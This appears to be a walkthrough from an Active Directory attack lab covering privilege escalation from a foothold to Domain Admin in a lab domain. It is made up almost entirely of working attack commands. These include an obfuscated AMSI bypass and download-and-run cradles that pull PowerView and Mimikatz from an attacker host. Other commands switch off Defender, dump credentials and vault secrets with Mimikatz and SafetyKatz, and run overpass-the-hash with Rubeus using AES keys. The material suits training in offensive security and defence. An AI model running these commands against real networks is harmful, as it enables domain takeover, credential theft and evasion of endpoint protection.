Obj 7 Derivative Local Admin

Task - Target a domain where a domain admin has a session and compromise the machine to escalate privs to Domain Admin.

Theses commands are going to be ran from the reverse shell on dcorp-ci

Run AMSI bypass on machine

S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

Load PowerView onto the machine

iex ((New-Object Net.WebClient).DownloadString('http://172.16.100.X/PowerView.ps1'))

Find Domain user location

Find-DomainUserLocation

The above command finds active sessions of domain users. We are looking for a DA session if possible.

Check if we can run commands on the sessions available

Invoke-Command -ScriptBlock {whoami;hostname} -ComputerName dcorp-mgmt

Get Mimikatz on the Target Machine

iex (iwr http://172.16.100.X/Invoke-Mimikatz.ps1-UseBasicParsing)

Create a new session for Target Machine

$sess = New-PSSession -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local

Disable Protections and AMSI on Target Machine

Invoke-command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess

Now we can Invoke Mimikatz on Target Machine to Get Creds

Invoke-command -ScriptBlock ${function:Invoke-Mimikatz} -Session $sess

Now we can use Over Pass the Hash with Rubeus

We can use Rubeus, Mimikatz or SafteyKatz for this as well.

Rubeus Over Pass The Hash

C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Mimikatz Over Pass The Hash

Invoke-Mimikatz -Command '"sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /run:powershell.exe"'

SafetyKatz Over Pass The Hash

C:\AD\Tools\SafetyKatz.exe "sekurlsa::pth /user:srvadmin /domain:dollarcorp.moneycorp.local /aes256:145019659e1da3fb150ed94d510eb770276cfbd0cbd834a4ac331f2effe1dbb4 /run:cmd.exe" "exit"

- DERIVATIVE LOCAL ADMIN -

In the session we created using svcadmin creds above we are going to see who we can access as local admin.

.C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess

We can start a PSSession on any available machines we find

Enter-PSSession -ComputerName dcorp-adminsrv

We need to check what language mode we are in first.

$ExecutionContext.SessionState.LanguageMode

Next we can check the AppLocker policy to see if/where we can run scripts from

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

We can now disable Windows Defender and AMSI on the sess

Set-MpPreference -DisableRealtimeMonitoring $true -Verbose
Set-MpPreference -DisableIOAVProtection $true -Verbose

Create a Modified Mimikatz script to execute on load

Create a copy of Invoke-Mimikatz.ps1 and rename it to Invoke-MimikatzEx.ps1.
-Open Invoke-MimikatzEx.ps1 in PowerShell ISE
-Add  Invoke-Mimikatz–Command sekurlsa::ekeys -to the very end of the file.

Now we can transfer the new file over

We are copying this from our foothold machine in the process created for svcadmin

PS C:\AD\Tools> Copy-Item C:\AD\Tools\Invoke-MimikatzEx.ps1 \\dcorp-adminsrv.dollarcorp.moneycorp.local\c$\'Program Files'

Back on the Target Machine we can invoke Mimikatz

[dcorp-adminsrv]: PS C:\Program Files> .\Invoke-MimikatzEx.ps1

Over Pass the Hash with SafetyKatz

Again we can use SafetyKatz, Rubeus or Mimikatz to do this also. We will use one of the creds we found in the previous hash dump.

C:\AD\Tools\SafetyKatz.exe "sekurlsa::pth /user:srvadmin /domain:dollarcorp.moneycorp.local /aes256:145019659e1da3fb150ed94d510eb770276cfbd0cbd834a4ac331f2effe1dbb4 /run:cmd.exe" "exit"

On the new process that started we run invishell and look for PSRemoting local admins again.

. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess -Verbose

Extract credentials from our findings Using SafetyKatz

We can use mimikatz to do this but this time we are going to use safetykatz. So we need to copy loader.exe to the target machine first.

echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-mgmt\C$\Users\Public\Loader.exe

We can now winrs or PSRemote in and Invoke SafetyKatz

C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::ekeys exit

We can do the same as above with Mimikatz do dump the credentials of the target machine

  1. First we need to disable AMSI on the target machine (copy and past AMSI Bypass)

  2. Download and Execute Mimikatz.ps1 iex (iwr http://172.16.100.X/Invoke-Mimikatz.ps1-UseBasicParsing)

  3. On Target machine run: Invoke-Mimikatz–Command '"sekurlsa::ekeys"'

We can also dump credentials from the credentials vault with mimikatz

Invoke-Mimikatz -Command '"token::elevate" "vault::cred /patch"'

Finally we can use Over Pass the Hash with svcadmin credentials to start a new process as Domain Admin

C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show/ptt
PreviousObj 6 BloodHoundNextObj 8 Golden Ticket / DCSync

Last updated